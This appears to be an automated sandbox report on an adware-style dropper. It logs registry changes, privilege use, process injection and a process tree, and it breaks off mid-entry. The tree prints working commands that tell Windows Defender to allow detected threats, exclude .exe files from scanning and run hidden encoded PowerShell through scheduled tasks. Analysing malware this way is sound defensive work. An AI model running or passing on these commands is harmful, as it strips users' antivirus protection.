Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IyFOGQOPsSrjKINQhDMF"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS\ = "0"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\ = "BackgroundScriptEngine Class"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable\	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tgZBuA7n.dll"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tEPkMPP.exe"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\ = "muVCVUSRFKgBfVwebaH[()(_mNyf{gjxSdMF"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tEPkMPP.exe"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	wfgcocW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	wfgcocW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	wfgcocW.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exewfgcocW.exepowershell.exepowershell.exepowershell.exe

pid	process
1388	powershell.exe
1388	powershell.exe
1168	powershell.exe
1168	powershell.exe
1984	powershell.exe
1984	powershell.exe
1240	powershell.EXE
968	powershell.exe
968	powershell.exe
1724	powershell.exe
1724	powershell.exe
2040	powershell.exe
2040	powershell.exe
1552	powershell.EXE
1028	powershell.exe
1028	powershell.exe
824	powershell.exe
824	powershell.exe
1636	powershell.exe
1636	powershell.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
1492	wfgcocW.exe
2012	powershell.exe
2012	powershell.exe
316	powershell.exe
316	powershell.exe
1220	powershell.exe
1220	powershell.exe
1492	wfgcocW.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exepowershell.exepowershell.EXEWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeIncreaseQuotaPrivilege	692	WMIC.exe
Token: SeSecurityPrivilege	692	WMIC.exe
Token: SeTakeOwnershipPrivilege	692	WMIC.exe
Token: SeLoadDriverPrivilege	692	WMIC.exe
Token: SeSystemProfilePrivilege	692	WMIC.exe
Token: SeSystemtimePrivilege	692	WMIC.exe
Token: SeProfSingleProcessPrivilege	692	WMIC.exe
Token: SeIncBasePriorityPrivilege	692	WMIC.exe
Token: SeCreatePagefilePrivilege	692	WMIC.exe
Token: SeBackupPrivilege	692	WMIC.exe
Token: SeRestorePrivilege	692	WMIC.exe
Token: SeShutdownPrivilege	692	WMIC.exe
Token: SeDebugPrivilege	692	WMIC.exe
Token: SeSystemEnvironmentPrivilege	692	WMIC.exe
Token: SeRemoteShutdownPrivilege	692	WMIC.exe
Token: SeUndockPrivilege	692	WMIC.exe
Token: SeManageVolumePrivilege	692	WMIC.exe
Token: 33	692	WMIC.exe
Token: 34	692	WMIC.exe
Token: 35	692	WMIC.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeIncreaseQuotaPrivilege	1264	WMIC.exe
Token: SeSecurityPrivilege	1264	WMIC.exe
Token: SeTakeOwnershipPrivilege	1264	WMIC.exe
Token: SeLoadDriverPrivilege	1264	WMIC.exe
Token: SeSystemProfilePrivilege	1264	WMIC.exe
Token: SeSystemtimePrivilege	1264	WMIC.exe
Token: SeProfSingleProcessPrivilege	1264	WMIC.exe
Token: SeIncBasePriorityPrivilege	1264	WMIC.exe
Token: SeCreatePagefilePrivilege	1264	WMIC.exe
Token: SeBackupPrivilege	1264	WMIC.exe
Token: SeRestorePrivilege	1264	WMIC.exe
Token: SeShutdownPrivilege	1264	WMIC.exe
Token: SeDebugPrivilege	1264	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1264	WMIC.exe
Token: SeRemoteShutdownPrivilege	1264	WMIC.exe
Token: SeUndockPrivilege	1264	WMIC.exe
Token: SeManageVolumePrivilege	1264	WMIC.exe
Token: 33	1264	WMIC.exe
Token: 34	1264	WMIC.exe
Token: 35	1264	WMIC.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	1240	powershell.EXE
Token: SeIncreaseQuotaPrivilege	1656	WMIC.exe
Token: SeSecurityPrivilege	1656	WMIC.exe
Token: SeTakeOwnershipPrivilege	1656	WMIC.exe
Token: SeLoadDriverPrivilege	1656	WMIC.exe
Token: SeSystemProfilePrivilege	1656	WMIC.exe
Token: SeSystemtimePrivilege	1656	WMIC.exe
Token: SeProfSingleProcessPrivilege	1656	WMIC.exe
Token: SeIncBasePriorityPrivilege	1656	WMIC.exe
Token: SeCreatePagefilePrivilege	1656	WMIC.exe
Token: SeBackupPrivilege	1656	WMIC.exe
Token: SeRestorePrivilege	1656	WMIC.exe
Token: SeShutdownPrivilege	1656	WMIC.exe
Token: SeDebugPrivilege	1656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1656	WMIC.exe
Token: SeRemoteShutdownPrivilege	1656	WMIC.exe
Token: SeUndockPrivilege	1656	WMIC.exe
Token: SeManageVolumePrivilege	1656	WMIC.exe
Token: 33	1656	WMIC.exe
Token: 34	1656	WMIC.exe
Token: 35	1656	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1ef565125b92bec9766369c997694ad2.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exeforfiles.execmd.exe

description	pid	process	target process
PID 1100 wrote to memory of 1276	1100	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 1100 wrote to memory of 1276	1100	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 1100 wrote to memory of 1276	1100	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 1100 wrote to memory of 1276	1100	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 1100 wrote to memory of 1276	1100	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 1100 wrote to memory of 1276	1100	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 1100 wrote to memory of 1276	1100	1ef565125b92bec9766369c997694ad2.exe	SimplInst.exe
PID 1276 wrote to memory of 1428	1276	SimplInst.exe	SimplInst.exe
PID 1276 wrote to memory of 1428	1276	SimplInst.exe	SimplInst.exe
PID 1276 wrote to memory of 1428	1276	SimplInst.exe	SimplInst.exe
PID 1276 wrote to memory of 1428	1276	SimplInst.exe	SimplInst.exe
PID 1276 wrote to memory of 1428	1276	SimplInst.exe	SimplInst.exe
PID 1276 wrote to memory of 1428	1276	SimplInst.exe	SimplInst.exe
PID 1276 wrote to memory of 1428	1276	SimplInst.exe	SimplInst.exe
PID 1428 wrote to memory of 1532	1428	SimplInst.exe	cmd.exe
PID 1428 wrote to memory of 1532	1428	SimplInst.exe	cmd.exe
PID 1428 wrote to memory of 1532	1428	SimplInst.exe	cmd.exe
PID 1428 wrote to memory of 1532	1428	SimplInst.exe	cmd.exe
PID 1428 wrote to memory of 1532	1428	SimplInst.exe	cmd.exe
PID 1428 wrote to memory of 1532	1428	SimplInst.exe	cmd.exe
PID 1428 wrote to memory of 1532	1428	SimplInst.exe	cmd.exe
PID 1532 wrote to memory of 316	1532	cmd.exe	forfiles.exe
PID 1532 wrote to memory of 316	1532	cmd.exe	forfiles.exe
PID 1532 wrote to memory of 316	1532	cmd.exe	forfiles.exe
PID 1532 wrote to memory of 316	1532	cmd.exe	forfiles.exe
PID 1532 wrote to memory of 316	1532	cmd.exe	forfiles.exe
PID 1532 wrote to memory of 316	1532	cmd.exe	forfiles.exe
PID 1532 wrote to memory of 316	1532	cmd.exe	forfiles.exe
PID 316 wrote to memory of 1744	316	forfiles.exe	cmd.exe
PID 316 wrote to memory of 1744	316	forfiles.exe	cmd.exe
PID 316 wrote to memory of 1744	316	forfiles.exe	cmd.exe
PID 316 wrote to memory of 1744	316	forfiles.exe	cmd.exe
PID 316 wrote to memory of 1744	316	forfiles.exe	cmd.exe
PID 316 wrote to memory of 1744	316	forfiles.exe	cmd.exe
PID 316 wrote to memory of 1744	316	forfiles.exe	cmd.exe
PID 1744 wrote to memory of 1388	1744	cmd.exe	powershell.exe
PID 1744 wrote to memory of 1388	1744	cmd.exe	powershell.exe
PID 1744 wrote to memory of 1388	1744	cmd.exe	powershell.exe
PID 1744 wrote to memory of 1388	1744	cmd.exe	powershell.exe
PID 1744 wrote to memory of 1388	1744	cmd.exe	powershell.exe
PID 1744 wrote to memory of 1388	1744	cmd.exe	powershell.exe
PID 1744 wrote to memory of 1388	1744	cmd.exe	powershell.exe
PID 1428 wrote to memory of 1220	1428	SimplInst.exe	forfiles.exe
PID 1428 wrote to memory of 1220	1428	SimplInst.exe	forfiles.exe
PID 1428 wrote to memory of 1220	1428	SimplInst.exe	forfiles.exe
PID 1428 wrote to memory of 1220	1428	SimplInst.exe	forfiles.exe
PID 1428 wrote to memory of 1220	1428	SimplInst.exe	forfiles.exe
PID 1428 wrote to memory of 1220	1428	SimplInst.exe	forfiles.exe
PID 1428 wrote to memory of 1220	1428	SimplInst.exe	forfiles.exe
PID 1220 wrote to memory of 1064	1220	forfiles.exe	cmd.exe
PID 1220 wrote to memory of 1064	1220	forfiles.exe	cmd.exe
PID 1220 wrote to memory of 1064	1220	forfiles.exe	cmd.exe
PID 1220 wrote to memory of 1064	1220	forfiles.exe	cmd.exe
PID 1220 wrote to memory of 1064	1220	forfiles.exe	cmd.exe
PID 1220 wrote to memory of 1064	1220	forfiles.exe	cmd.exe
PID 1220 wrote to memory of 1064	1220	forfiles.exe	cmd.exe
PID 1064 wrote to memory of 1216	1064	cmd.exe	reg.exe
PID 1064 wrote to memory of 1216	1064	cmd.exe	reg.exe
PID 1064 wrote to memory of 1216	1064	cmd.exe	reg.exe
PID 1064 wrote to memory of 1216	1064	cmd.exe	reg.exe
PID 1064 wrote to memory of 1216	1064	cmd.exe	reg.exe
PID 1064 wrote to memory of 1216	1064	cmd.exe	reg.exe
PID 1064 wrote to memory of 1216	1064	cmd.exe	reg.exe
PID 1064 wrote to memory of 1004	1064	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\1ef565125b92bec9766369c997694ad2.exe
"C:\Users\Admin\AppData\Local\Temp\1ef565125b92bec9766369c997694ad2.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1100

C:\Users\Admin\AppData\Local\Temp\7zS76C5.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1276

C:\Users\Admin\AppData\Local\Temp\7zS77FD.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:692

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:548

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:432

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1064

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1216

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1004

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gWuftJWZT" /SC once /ST 06:04:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1632

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gWuftJWZT"
4⤵
PID:1376

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gWuftJWZT"
4⤵
PID:1556

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqZkKdgiyjBiVwZYfn" /SC once /ST 08:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\pcwFfkT.exe\" nv /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1376

C:\Windows\system32\taskeng.exe
taskeng.exe {2686133F-F49A-48D4-B73A-01DBBA244A61} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
1⤵
PID:1496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1552

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:964

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\oPvpdKZG\dKoAlFD.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\oPvpdKZG\dKoAlFD.exe en /S
2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1736

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:860

C:\Windows\SysWOW64\cmd.exe
